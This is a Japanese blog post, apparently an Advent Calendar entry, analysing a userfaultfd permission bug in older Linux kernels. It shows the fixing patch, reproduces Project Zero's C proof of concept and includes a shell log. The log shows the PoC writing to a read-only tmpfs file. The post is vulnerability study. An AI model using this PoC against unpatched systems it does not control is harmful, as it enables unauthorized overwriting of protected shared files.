概要

Linux kernel 4.19.7以前のuserfaultfdにはアクセス制御にバグがある.

userfaultfdについてはこちら

影響

ioctluffdio_copyしたりする時,対象のメモリ空間に対する権限を確認していなかった.

project-zeroによる解説がわかりやすいのでここから先はこのページじゃ無くてそっちを読め.

patch

この辺

patchを読めば問題点もわかる.

まとめてびゃ〜ってした奴↓

diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 356d2b8568c1..cd58939dc977 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1361,6 +1361,19 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
                ret = -EINVAL;
                if (!vma_can_userfault(cur))
                        goto out_unlock;
+
+               /*
+                * UFFDIO_COPY will fill file holes even without
+                * PROT_WRITE. This check enforces that if this is a
+                * MAP_SHARED, the process has write permission to the backing
+                * file. If VM_MAYWRITE is set it also enforces that on a
+                * MAP_SHARED vma: there is no F_WRITE_SEAL and no further
+                * F_WRITE_SEAL can be taken until the vma is destroyed.
+                */
+               ret = -EPERM;
+               if (unlikely(!(cur->vm_flags & VM_MAYWRITE)))
+                       goto out_unlock;
+
                /*
                 * If this vma contains ending address, and huge pages
                 * check alignment.
@@ -1406,6 +1419,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
                BUG_ON(!vma_can_userfault(vma));
                BUG_ON(vma->vm_userfaultfd_ctx.ctx &&
                       vma->vm_userfaultfd_ctx.ctx != ctx);
+               WARN_ON(!(vma->vm_flags & VM_MAYWRITE));

                /*
                 * Nothing to do: this vma is already registered into this
@@ -1552,6 +1566,7 @@ static int userfaultfd_unregister(struct userfaultfd_ctx *ctx,
                cond_resched();

                BUG_ON(!vma_can_userfault(vma));
+               WARN_ON(!(vma->vm_flags & VM_MAYWRITE));

                /*
                 * Nothing to do: this vma is already registered into this
diff --git a/mm/hugetlb.c b/mm/hugetlb.c
index 7f2a28ab46d5..705a3e9cc910 100644
--- a/mm/hugetlb.c
+++ b/mm/hugetlb.c
@@ -4080,7 +4080,7 @@ int hugetlb_mcopy_atomic_pte(struct mm_struct *dst_mm,

                /* fallback to copy_from_user outside mmap_sem */
                if (unlikely(ret)) {
-                       ret = -EFAULT;
+                       ret = -ENOENT;
                        *pagep = page;
                        /* don't free the page */
                        goto out;
diff --git a/mm/shmem.c b/mm/shmem.c
index 42b70978e814..6c54a6874e41 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -2238,7 +2238,7 @@ static int shmem_mfill_atomic_pte(struct mm_struct *dst_mm,
                                *pagep = page;
                                shmem_inode_unacct_blocks(inode, 1);
                                /* don't free the page */
-                               return -EFAULT;
+                               return -ENOENT;
                        }
                } else {                /* mfill_zeropage_atomic */
                        clear_highpage(page);
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 5029f241908f..43cf314cfddd 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -48,7 +48,7 @@ static int mcopy_atomic_pte(struct mm_struct *dst_mm,

                /* fallback to copy_from_user outside mmap_sem */
                if (unlikely(ret)) {
-                       ret = -EFAULT;
+                       ret = -ENOENT;
                        *pagep = page;
                        /* don't free the page */
                        goto out;
@@ -205,8 +205,9 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,
                if (!dst_vma || !is_vm_hugetlb_page(dst_vma))
                        goto out_unlock;
                /*
-                * Only allow __mcopy_atomic_hugetlb on userfaultfd
-                * registered ranges.
+                * Check the vma is registered in uffd, this is
+                * required to enforce the VM_MAYWRITE check done at
+                * uffd registration time.
                 */
                if (!dst_vma->vm_userfaultfd_ctx.ctx)
                        goto out_unlock;
@@ -274,7 +275,7 @@ static __always_inline ssize_t __mcopy_atomic_hugetlb(struct mm_struct *dst_mm,

                cond_resched();

-               if (unlikely(err == -EFAULT)) {
+               if (unlikely(err == -ENOENT)) {
                        up_read(&dst_mm->mmap_sem);
                        BUG_ON(!page);

@@ -380,7 +381,17 @@ static __always_inline ssize_t mfill_atomic_pte(struct mm_struct *dst_mm,
 {
        ssize_t err;

-       if (vma_is_anonymous(dst_vma)) {
+       /*
+        * The normal page fault path for a shmem will invoke the
+        * fault, fill the hole in the file and COW it right away. The
+        * result generates plain anonymous memory. So when we are
+        * asked to fill an hole in a MAP_PRIVATE shmem mapping, we'll
+        * generate anonymous memory directly without actually filling
+        * the hole. For the MAP_PRIVATE case the robustness check
+        * only happens in the pagetable (to verify it's still none)
+        * and not in the radix tree.
+        */
+       if (!(dst_vma->vm_flags & VM_SHARED)) {
                if (!zeropage)
                        err = mcopy_atomic_pte(dst_mm, dst_pmd, dst_vma,
                                               dst_addr, src_addr, page);
@@ -449,13 +460,9 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
        if (!dst_vma)
                goto out_unlock;
        /*
-        * Be strict and only allow __mcopy_atomic on userfaultfd
-        * registered ranges to prevent userland errors going
-        * unnoticed. As far as the VM consistency is concerned, it
-        * would be perfectly safe to remove this check, but there's
-        * no useful usage for __mcopy_atomic ouside of userfaultfd
-        * registered ranges. This is after all why these are ioctls
-        * belonging to the userfaultfd and not syscalls.
+        * Check the vma is registered in uffd, this is required to
+        * enforce the VM_MAYWRITE check done at uffd registration
+        * time.
         */
        if (!dst_vma->vm_userfaultfd_ctx.ctx)
                goto out_unlock;
@@ -489,7 +496,8 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
         * dst_vma.
         */
        err = -ENOMEM;
-       if (vma_is_anonymous(dst_vma) && unlikely(anon_vma_prepare(dst_vma)))
+       if (!(dst_vma->vm_flags & VM_SHARED) &&
+           unlikely(anon_vma_prepare(dst_vma)))
                goto out_unlock;

        while (src_addr < src_start + len) {
@@ -530,7 +538,7 @@ static __always_inline ssize_t __mcopy_atomic(struct mm_struct *dst_mm,
                                       src_addr, &page, zeropage);
                cond_resched();

-               if (unlikely(err == -EFAULT)) {
+               if (unlikely(err == -ENOENT)) {
                        void *page_kaddr;

userfaultfd.c

in userfaultfd_register

追加されたコードの重要なところ

ret = -EPERM;
if (unlikely(!(cur->vm_flags & VM_MAYWRITE)))
    goto out_unlock;

unlikelyについてはなんか前記事で書いた気がするので省略する.嘘.記事には書いてなかったわ

何をしているかは自明で,cur(型はvm_area_struct)が書き込み可能で無かった場合,EPERMでreturnする.

PoC

project-zeroがPoCも公開している

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <err.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdio.h>

static int uffd;
static void *uf_mapping;

int main(int argc, char **argv) {
        int rw_open_res = open("/dev/shm/uffd_test", O_RDWR);
        if (rw_open_res == -1)
                perror("can't open for writing as expected");
        else
                errx(1, "unexpected write open success");

        int mfd = open("/dev/shm/uffd_test", O_RDONLY);
        if (mfd == -1) err(1, "tmpfs open");
        uf_mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, mfd, 0);
        if (uf_mapping == (void*)-1) err(1, "shmat");

        // Documentation for userfaultfd:
        // http://man7.org/linux/man-pages/man2/userfaultfd.2.html
        // http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html
        // https://blog.lizzie.io/using-userfaultfd.html
        uffd = syscall(__NR_userfaultfd, 0);
        if (uffd == -1) err(1, "userfaultfd");
        struct uffdio_api api = { .api = 0xAA, .features = 0 };
        if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");

        struct uffdio_register reg = {
                .range = {
                        .start = (unsigned long)uf_mapping,
                        .len = 0x1000
                },
                .mode = UFFDIO_REGISTER_MODE_MISSING
        };
        if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");

        char buf[0x1000] = {'A', 'A', 'A', 'A'};
        struct uffdio_copy copy = {
                .dst = (unsigned long)uf_mapping,
                .src = (unsigned long)buf,
                .len = 0x1000,
                .mode = 0
        };
        if (ioctl(uffd, UFFDIO_COPY, &copy)) err(1, "copy");
        if (copy.copy != 0x1000) errx(1, "copy len");

        printf("x: 0x%08x\n", *(unsigned int*)uf_mapping);
        return 0;
}

再現手順

root@ubuntu-bionic:~# cd /dev/shm/
root@ubuntu-bionic:/dev/shm# umask 0022
root@ubuntu-bionic:/dev/shm# touch uffd_test
root@ubuntu-bionic:/dev/shm# truncate --size=4096 uffd_test
root@ubuntu-bionic:/dev/shm# exit
vagrant@ubuntu-bionic:~/uffd$ ls
uffd_demo  uffd_demo.c
vagrant@ubuntu-bionic:~/uffd$ cat uffd_demo.c
#define _GNU_SOURCE
#include <fcntl.h>
~~ snip ~~
vagrant@ubuntu-bionic:~/uffd$ ./uffd_demo
can't open for writing as expected: Permission denied
x: 0x41414141
vagrant@ubuntu-bionic:~/uffd$ sudo su
root@ubuntu-bionic:/home/vagrant/uffd# cat /dev/shm/uffd_test
AAAAroot@ubuntu-bionic:/home/vagrant/uffd#
root@ubuntu-bionic:/home/vagrant/uffd# hexdump -C /dev/shm/uffd_test
00000000  41 41 41 41 00 00 00 00  00 00 00 00 00 00 00 00  |AAAA............|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

あとがき

project-zeroはやっぱり凄いね^^

この記事はIPFactory Advent Calendar 2020の7日目の分とします.

IPFacotryについてはこちら

誰も書いてなさそうだったので桜Trickを見ながら急いで書きました.

昨日はfanotify-rs(セキュリティキャンプ全国大会2020Z-V: まとめ)でした.

明日はkumusanによるwebworker内でwasmを使用しようとして失敗した(WebGL)です.